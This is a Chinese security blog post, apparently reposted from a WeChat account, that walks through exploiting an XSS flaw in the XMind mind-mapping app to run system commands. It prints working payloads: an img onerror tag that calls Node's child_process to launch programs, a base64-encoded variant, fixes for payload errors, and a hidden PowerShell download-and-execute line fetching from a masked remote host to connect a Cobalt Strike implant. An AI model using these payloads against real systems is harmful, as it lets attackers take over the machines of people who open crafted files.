漏洞复现-XMind XSS 导致RCE

admin 2021年7月27日02:54:44评论109 views字数 1284阅读4分16秒阅读模式

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录


昨天新出来的Xmind xss可执行RCE在各大公众号上出现,但是很多公众号都不够详细,导致在执行的时候遇见各种报错。有师傅感叹,是不是刚出来洞就修了。

漏洞介绍:

XMind是风靡全球的头脑风暴和思维导图软件,为激发灵感和创意而生。Xmind被用于绘制思维导图等,近期在网上曝出xss漏洞,可执行系统命令。XMind 是一款专业的全球领先的商业思维导图软件,在国内使用广泛,拥有强大的功能、包括思维管理、商务演示、与办公软件协同工作等功能。它采用全球先进的Eclipse RCP软件架构,是集思维导图与头脑风暴于一体的可视化思考工具,能用来捕捉想法、理清思路、管理复杂信息并促进团队协作。XMind思维导图软件曾被著名互联网媒体Lifehacker评选为“最佳头脑风暴和思维导图工具”及”最受欢迎的思维导图软件”。


漏洞复现:

首先我们要准备一个存在漏洞的版本,可自行下载

根据部分公众号上的代码来复现

漏洞位置在大纲处:

漏洞复现-XMind XSS 导致RCE

进入大纲尝试插入xss代码:

漏洞复现-XMind XSS 导致RCE

这里需要注意:执行代码的时候必须鼠标的光标移到最后,触发xss可以按ctrl键或者空格

插入xss代码执行系统命令:

<img src=1 onerror="require('child_process').exec('calc.exe',null);">


漏洞复现-XMind XSS 导致RCE

当然也可以执行一些系统命令:

这里需要指出,网上很多xss代码都进行了base64编码:

<img src=# onerror='eval(newBuffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lwY29uZmlnIC9hbGwnLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>


但是我们执行这个的时候会报错:

漏洞复现-XMind XSS 导致RCE

这个时候我们只要把newBuffer中间加上空格即可:

漏洞复现-XMind XSS 导致RCE

上线cs:

这里注意downloadstring()里的单引号前要加转义

require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxx:8866/a'))"',(error,stdout, stderr)=>{   alert(`stdout: ${stdout}`);  });

上面的代码base64编码后执行上线:

<img src=# onerror='eval(new Buffer(`base64编码后的代码`,`base64`).toString())'>

漏洞复现-XMind XSS 导致RCE


本文始发于微信公众号(Fight Tigers Team):漏洞复现-XMind XSS 导致RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月27日02:54:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-XMind XSS 导致RCEhttp://cn-sec.com/archives/371702.html

发表评论

匿名网友 填写信息